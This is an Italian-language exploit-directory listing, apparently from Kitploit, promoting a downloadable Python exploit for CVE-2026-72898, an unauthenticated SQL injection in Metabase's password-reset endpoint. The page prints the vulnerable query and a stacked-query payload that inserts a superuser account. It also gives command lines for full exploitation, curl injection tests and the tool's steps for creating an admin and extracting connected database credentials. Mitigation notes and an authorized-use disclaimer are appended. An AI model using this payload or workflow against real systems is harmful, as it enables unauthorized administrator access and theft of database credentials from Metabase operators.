Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-72898 — Exploit Python per CVE-2026-72898, un'iniezione SQL non autenticata nell'endpoint di reimpostazione della password di Metabase che crea account amministratore ed estrae le credenziali del database. | Kitploit
Strumenti/GitHubGitHub/34zy/cve-2026-72898
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebPenetration TestingRed TeamingSicurezza dei Database
GitHub34zy/cve-2026-72898

CVE-2026-72898

Exploit Python per CVE-2026-72898, un'iniezione SQL non autenticata nell'endpoint di reimpostazione della password di Metabase che crea account amministratore ed estrae le credenziali del database.

6h 12m faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Metabase SQL Injection RCE

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

SQL injection non autenticata nell'endpoint /api/session/reset_password di Metabase. Crea account amministratore ed estrae le credenziali del database.

Affected: v58.0 - v63.3 | Patched: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


Quick Start

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

The Vulnerability

Concatenazione di stringhe nella query SQL:

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

Payload di attacco:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

Usage

Check only (no modification):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

Full exploitation:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

Manual testing:

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

What It Does

  1. Rileva l'istanza Metabase (SQLi boolean-based)
  2. Crea un utente amministratore tramite SQL injection
  3. Si autentica con il nuovo amministratore
  4. Estrae le credenziali del database connesso
  5. Verifica la compromissione completa del sistema

Impact

  • Accesso amministratore non autenticato
  • Estrazione delle credenziali del database
  • Compromissione del database connesso
  • Controllo completo dell'applicazione

Mitigation

NOW:

  • Aggiornare alla versione corretta
  • Bloccare /api/session/reset_password tramite WAF
  • Verificare gli account amministratore per aggiunte non autorizzate
  • Ruotare tutte le credenziali del database

LATER:

  • Utilizzare query parametrizzate
  • Aggiungere validazione dell'input
  • Implementare l'autenticazione su tutti gli endpoint sensibili
  • Abilitare il logging delle query SQL

Links

  • GitHub Advisory
  • NVD CVE Entry

Authorized use only. Unauthorized access is illegal.

Scarica lo strumento